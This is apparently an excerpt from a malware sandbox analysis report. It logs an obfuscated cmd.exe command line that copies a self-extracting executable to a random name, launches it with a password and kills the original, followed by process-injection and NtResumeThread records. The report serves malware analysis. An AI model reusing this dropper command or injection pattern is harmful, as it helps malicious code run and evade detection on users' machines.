cmdline "C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\test22\AppData\Local\Temp\sfx_123_209.exe" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "" == "" for %Q IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_209.exe" ) do taskkill /f /Im "%~nxQ"
cmdline C:\Windows\System32\cmd.exe /Q /c TyPe "C:\Users\test22\AppData\Local\Temp\sfx_123_209.exe" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "" == "" for %Q IN ( "C:\Users\test22\AppData\Local\Temp\sfx_123_209.exe" ) do taskkill /f /Im "%~nxQ"
Process injection Process 896 resumed a thread in remote process 2848
Process injection Process 2316 resumed a thread in remote process 2212
Process injection Process 2212 resumed a thread in remote process 2748
Process injection Process 2212 resumed a thread in remote process 200
Process injection Process 2640 resumed a thread in remote process 568
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000002fc
suspend_count: 1
process_identifier: 2848
1 0 0

NtResumeThread

 thread_handle: 0x000000f4
suspend_count: 0
process_identifier: 2212
1 0 0

NtResumeThread

 thread_handle: 0x00000304
suspend_count: 1
process_identifier: 2748
1 0 0

NtResumeThread

 thread_handle: 0x00000248
suspend_count: 1
process_identifier: 200
1 0 0

NtResumeThread

 thread_handle: 0x000000fc
suspend_count: 0
process_identifier: 568
1 0 0